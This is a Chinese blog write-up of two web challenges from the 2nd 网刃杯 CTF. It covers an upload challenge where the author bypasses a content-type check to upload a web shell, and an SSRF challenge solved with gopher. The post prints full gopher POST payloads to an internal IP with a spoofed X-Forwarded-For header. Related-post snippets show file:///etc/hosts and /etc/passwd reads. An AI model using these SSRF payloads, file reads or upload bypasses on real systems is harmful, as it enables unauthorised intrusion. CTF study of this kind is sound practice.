第二届网刃杯web题复现

已于 2022-06-22 14:55:35 修改
阅读量216 收藏
点赞数
文章标签: 前端 php 开发语言
于 2022-06-22 14:53:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nareku/article/details/124431892
版权
本文介绍了两道关于Web安全的题目,第一部分涉及文件上传和PHP解析限制,通过Burp Suite修改content-type来尝试绕过。第二部分讨论了SSRF漏洞,特别是结合Gopher协议进行利用,通过构造HTTP数据包并URL编码来访问内部资源获取flag。学习了Gopher协议的基本概念和在SSRF中的应用。
摘要由CSDN通过智能技术生成

好久没有更新了,发现一个月前写的复现还没发布,小小上传一下(忘记下载题目了 只能干巴巴看了 没办法复现了呜呜呜

近期都在学习开发和python,关于web的实在是吐不出什么 等过段时间有空了再继续学习和更新web吧呜呜呜

1.upload

 

是很熟悉的upload题,按照惯例上传个木马看看

显然是对文件content-type的检验,用Bp抓包改包 

回显文件存储路径,访问一下

 发现并不解析php。看到题目说和sql注入有关,那么就浅浅找一下注入点

常规报错注入()

 

2.sign_in

知道是ssrf漏洞但是当时打的时候只想到传参/flag.txt,硬是找不到目录

看了wp才知道是ssrf+gopher协议  涨知识啦

1)gopher协议

Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。

 Gopher协议格式

URL:gopher://<host>:<port>/<gopher-path>_后接上TCP数据流

Gopher发送请求HTTP GET请求:

在gopher协议中发送HTTP的数据,需要以下三步:

1、构造HTTP数据包
2、URL编码、替换回车换行为%0d%0a
3、发送gopher协议

题目

打开题目就是源码

看到curl差不多就是可以想到gopher协议

直接构造一个http数据包,进行url编码,直接进行传参即可

gopher://172.73.23.100:80/_POST / HTTP/1.1
Host: 172.73.23.100:80
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For:127.0.0.1
Referer: bolean.club
Content-Length: 3

b=1

记得url编码:
1、问号(?)需要转码为URL编码,也就是%3f
2、回车换行要变为%0d%0a,但如果直接用工具转,可能只会有%0a
3、在HTTP包的最后要加%0d%0a,代表消息结束(具体可研究HTTP包结束)

或者(某大佬的wp参数 这个确实没看懂)

gopher%3A//172.73.25.100%3A80/_POST%2520/index.php%253Fa%253D11111%2520HTTP/1.1%250D%250AHost%253A%2520172.73.25.100%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AX-forwarded-for%253A%2520127.0.0.1%250D%250AReferer%253A%2520bolean.club%250D%250AContent-Length%253A%252036%250D%250A%250D%250Ab%253Dc384d200658f258e5b5c681bf0aa29a811%250D%250A

得到flag

narukuuuu
关注
第二届网刃杯部分复现
XINO
04-26 2031
萌新去年打了一回,没想到今年这么多报名的 //菜菜,感觉某些目就是为了出而出的 signin SSRF一般是先想办法得到目标主机的网络配置信息,如读取/etc/hosts、/proc/net/arp、/proc/net/fib_trie(存放网络适配器地址),从而获得目标主机的内网网段并进行爆破,后面两个所需要的权限高一点。 ARP记录得到WEB地址 http://124.222.24.150:8091/?url=file:///etc/hosts 得到内网ip 172.73.23.100 <?
[CTF]-网刃杯复现
Mr.木Mu
05-22 573
网刃杯复现ssrf_sign_inuploadeasyiscxyp07移动的黑客ncsubjcarefulguy ssrf_sign_in ssrf目 使用Goper协议 可以读文件 ?url=file:///etc/passwd 翻一下arp记录,看看其他web服务 发现内网ip 172.73.23.100 然后使用gopher协议post传参 现在bp里修改传入的参数 然后进行url编码,然后把%0A换成%0D%0A,在进行url编码 因为在传参的时候Gopher会解码一次,然后GET
第二届网刃杯部分wp
Sentiment的博客
04-26 2555
Sign_in 目描述:炒鸡简单的签到,玩的开心~~~~ 目链接见附件,每个链接均可访问,环境5分钟重启一次。 file协议访问/etc/hosts,发现内网ip 扫描c段,发现127.73.23.100存活,需要GET传参一个a http://124.222.24.150:8091/?url=172.73.23.100 传a提示需要POST传b,这里的b,是指在172.73.23.100中传b,而当前host是:124.222.24.150,所以这里用到了gopher协议的POST传参 构造
gopher协议
weixin_52963334的博客
09-17 965
Gopher是Internet的一个信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,在构成符合gopher协议的请求。gopher协议是ssrf利用中最强大的协议(万金油协议)。默认使用tcp70端口。gopher在各种变成语言中的使用限制。
第二届网刃杯CTF-wp
qq_45603443的博客
04-26 862
第二届网刃杯CTF-wpWebez_javaezjsSign_inuploadReez_algorithm定时启动Re_functionfreestyleMisceasyiecTip Web ez_java package me.su; import org.springframework.expression.common.TemplateParserContext; import org.springframework.expression.spel.standard.SpelExpressionPar
第一届暗泉杯web wp(包括复现),以及部分签到
m0_57674981的博客
12-08 3477
总分2108,排行57,还是太水了,记录一下叭 目录 web 签到: [萌]odd_upload easyinject hideandseek 杂项 签到 [萌新]在哪呢 密码学 [签到]键盘侠 [萌新]素数 逆向 [签到]signin web 签到: 直接手拼出来,提交后发现不对,base64在解密一下就过了 [萌]odd_upload 目描述:目录结构与官方项目example相同 打...
强网杯SQL复现php.zip
12-17
【标】"强网杯SQL复现php.zip"是一个针对网络安全竞赛——强网杯的解资源包,其中包含了与SQL(结构化查询语言)相关的挑战。这个压缩包特别关注了如何在PHP环境中重现这些SQL目。 【描述】描述中的...
2020-网鼎杯-白虎组-Web-PicDown(可复现) | 考查/proc文件系统应用
一醉一休的博客
08-22 869
利用linux下面的一个特性,系统中如果一个程序打开了一个文件没有关闭,即便从外部(如os.remove(SECRET_FILE))删除之后,在 /proc 这个进程的 pid 目录下的 fd 文件描述符目录下还是会有这个文件的 fd,通过这个我们即可得到被删除文件的内容,/proc/[pid]/fd 这个目录里包含了进程打开文件的情况,pid是进程记录的打开文件的序号。解决这两个问,虚拟机服务器成功运行后,重新反弹shell,还是不行(裂开!🍺暴力破解最后一个数字,这道是3,
“鹏城杯”网络安全竞赛开赛 复现真实网络靶场环境.pdf
09-20
“鹏城杯”网络安全竞赛开赛 复现真实网络靶场环境.pdf
第二届网刃杯网络安全大赛 Writeup
qq_49422880的博客
04-26 3766
第二届网刃杯网络安全大赛 Writeup前言MISC玩坏的XP *ISCncsubjcarefulguyeasyiecxypo7喜欢移动的黑客*LED_BOOM*需要安全感*cryptolalia*WEBSign_inREfreestyeez_algorithmRe_function 前言 看了去年的这个比赛,感觉难度比较适中,于是尝试今年去参加一下。成绩也不是很好感觉打CTF还是需要一定的经验,节奏和时间没安排好,导致上午出了五个后下午就再没出,有点小遗憾。取证也没出…还是得多看看套神博客。 MIS
Golang之发送http请求,GET、POST
weixin_34419326的博客
06-03 3932
1. GET func Get(url string, params map[string]string, headers map[string]string) (*http.Response, error) { //new request req, err := http.NewRequest(http.MethodGet, url, nil) if err != nil { log....
SSRF基础:Gopher协议发送Get和Post请求
weixin_45887311的博客
07-13 5683
为了调试方便,我在win10下安装curl的工具 下载地址:https://curl.haxx.se/download.html 但目前提供的版本已经不支持gopher协议了,所以我千辛万苦找到了7.60的win64版本,支持发送gopher,dict协议 7.60地址:https://wws.lanzous.com/iaV55ekyfjc 点击即可下载 解压后把bin目录加入windows环境变量 一、什么是gopher协议? 定义:Gopher是Inter...
golang 发送 http 请求
缘故的博客
02-11 680
request // Request method:GET or POST func Request(method string, reqURL string, reqBody string) (res []byte, err error) { client := &amp;http.Client{} req, err := http.NewRequest(met...
前端 Flex 布局语法详解
最新发布
ning的博客
11-10 723
Flex是Flexible Box的缩写,意为“弹性布局”。它允许容器内的项目(子元素)自动调整大小,以适应不同屏幕尺寸和布局需求。如果需要行内Flex布局,可以使用Flex布局提供了一种强大而灵活的方式来创建响应式布局。通过理解并应用上述属性,你可以轻松地创建出复杂且适应不同屏幕尺寸的布局。随着现代浏览器对Flex布局的广泛支持,它已经成为前端开发中不可或缺的一部分。版权声明:本博客内容为原创,转载请保留原文链接及作者信息。参考文章CSDN - Flex布局详解菜鸟教程 - Flex 布局语法教程。
Web前端第二次作业
nixiaoge的博客
11-05 396
作业要求:制作带有下拉悬停菜单的导航栏。
【Java Web】JSP实现数据传递和保存(上)九大内置对象 request
m0_66584716的博客
11-07 934
JSP(JavaServer Pages)提供了九个内置对象,这些对象在JSP页面中可以直接使用,无需显式声明。这些内置对象提供了对请求、响应、会话等常用功能的访问,使得开发者可以更方便地处理Web应用程序中的各种任务。
基于 SpringBoot 实现QQ邮箱验证码注册功能
2301_79201049的博客
11-06 664
找到并开通以下的邮件协议服务,而且服务开启也较为简单,需要我们发送一个短信到指定的号码,开启后平台会提供一个授权码,一定要记住这个授权码,发邮件的时候需要这个。host 是根据服务主机区分,网易邮箱是 smtp.163.com, qq邮箱是 smtp.qq.com。其中的 username 是你第一步中操作的邮箱账号,nickname 是接收者收到邮件中显示的发件人。发送邮件的核心依赖是 mail ,由于该项目还涉及其他依赖就全都导进来了。(1)首先打开QQ邮箱,点击设置并来到账号页面。
Mybatis拦截器中获取@RequestBody表单的值修改查询SQL
十二的博客
11-06 487
Slf4j/*** 存储body数据的容器*/// 将body数据存储起来try {try {= null) {if (reader!
vue2 -- el-form组件动态增减表单项及表单项验证
King Saj
11-06 253
在数据录入场景(如订单信息录入)中,可根据实际情况(如商品种类增加)动态添加表单项(如商品相关信息)。包含必填项验证和数据格式验证(如邮箱、电话格式),防止错误数据提交。// 此处执行错误的逻辑。// 执行父组件回调。
强网杯SQL复现php解压缩实战教程
2. index.php:这个文件可能是一个Web入口文件,它可能包含有用于展示Web页面和提供用户交互的代码。在涉及SQL注入的目中,它很可能是被注入点或者包含注入漏洞的页面。 3. mysqli.php:这个文件可能是用来与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值